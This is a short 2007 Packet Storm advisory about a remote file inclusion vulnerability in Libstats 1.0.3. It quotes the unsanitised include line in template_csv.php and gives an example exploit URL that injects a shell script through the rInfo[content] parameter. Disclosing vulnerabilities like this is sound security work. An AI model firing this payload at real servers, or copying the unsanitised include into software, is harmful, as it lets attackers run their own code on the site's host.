libstats-rfi.txt

2007-05-21T00:00:00
ID PACKETSTORM:56834
Type packetstorm
Reporter Cyber-Security
Modified 2007-05-21T00:00:00

Description

                                        
                                            `#Libstats 1.0.3 <= Remote File Inclusion Vulnerability  
#  
#Vuln Code  
##############################################################################################  
#  
#ERROR1:template_csv.php  
#  
#include $rInfo['content']; <<< RFI CODE  
#  
#  
#BUG1:  
#  
#Example1:http://site.com/path/template_csv.php?rInfo[content]=[[Sh3LL Script]]  
#  
#Script Download  
##############################################################################################  
#  
#http://www.wendt.wisc.edu/projects/systems/libstats/releases/libstats-1.0.3.zip  
#  
##############################################################################################  
#  
#Cyber-Security <> Cyber-warrior.org  
#  
##############################################################################################  
  
`